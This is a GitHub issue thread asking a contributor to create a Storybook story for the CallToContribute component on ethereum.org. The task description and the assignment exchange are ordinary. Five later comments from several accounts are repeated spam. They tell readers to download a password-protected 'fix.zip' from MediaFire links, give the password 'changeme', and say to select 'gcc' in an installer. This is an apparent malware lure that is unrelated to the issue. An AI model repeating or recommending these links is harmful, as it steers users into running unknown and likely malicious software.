### ISSUE TITLE
Create story for CallToContribute component

### ISSUE THREAD

**Issue by corwintines** [ethereum/ethereum-org-website#13733]
# Create story tests for CallToContribute component

## Prerequisite

To get yourself up to speed on how we use storybook on ethereum.org, learn more [here](https://github.com/ethereum/ethereum-org-website/blob/dev/docs/applying-storybook.md)

## What to do

- [ ] Move `/src/components/CallToContribute.tsx` to `/src/components/CallToContribute/index.tsx`
- [ ] Fix any filepath changes to imports for the CallToContribute component
- [ ] Create story file `/src/components/CallToContribute/CallToContribute.stories.tsx`
- [ ] Write story testing render of the CallToContribute component in context of use

**Comment by corwintines** [comment]
@Baystef if you comment here I can assign to you

**Comment by Baystef** [comment]
> @Baystef if you comment here I can assign to you

Kindly assign to me @corwintines . Thanks

**Comment by royalkush** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Evul88** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by NEKO-JOJUK** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NEKO-JOJUK** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
